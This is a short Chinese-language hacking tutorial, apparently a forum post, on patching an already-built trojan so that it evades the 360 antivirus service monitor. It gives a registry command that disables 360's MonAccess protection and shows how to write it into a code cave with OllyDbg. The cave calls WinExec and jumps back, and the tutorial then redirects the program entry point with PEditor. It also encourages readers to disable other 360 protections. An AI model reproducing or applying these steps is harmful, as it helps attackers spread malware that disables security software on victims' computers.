ASM匯編

這個是最舒服的， 用OD打開已經配置好的馬， 找0區（也可以用TOPO加空段）要很大一片哦！右擊， 選擇“二進制”→“編輯”， 在ASCII中輸入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”記下寫入命令的改動的第一個地址， 假設為401180。

再找一個小空段， 記下地址， 假設為40116A

寫入：

Push 401180                (也就是那個改動的地址)

Call WinExec

Jmp 原程序入口點（在OD右邊窗口的EIP后面可以看到）

打開OC把40116A轉換為文件偏移0000056A

再用PEditor打開， 把原入口點改為0000056A

這樣一個過360服務監控的木馬就誕生了。

（大家完全可以按照加花的步驟來寫， 就是命令不同而已）

大家也可以禁用其他360的監控項目， 即使加個花都沒問題， 隨便大家發揮了。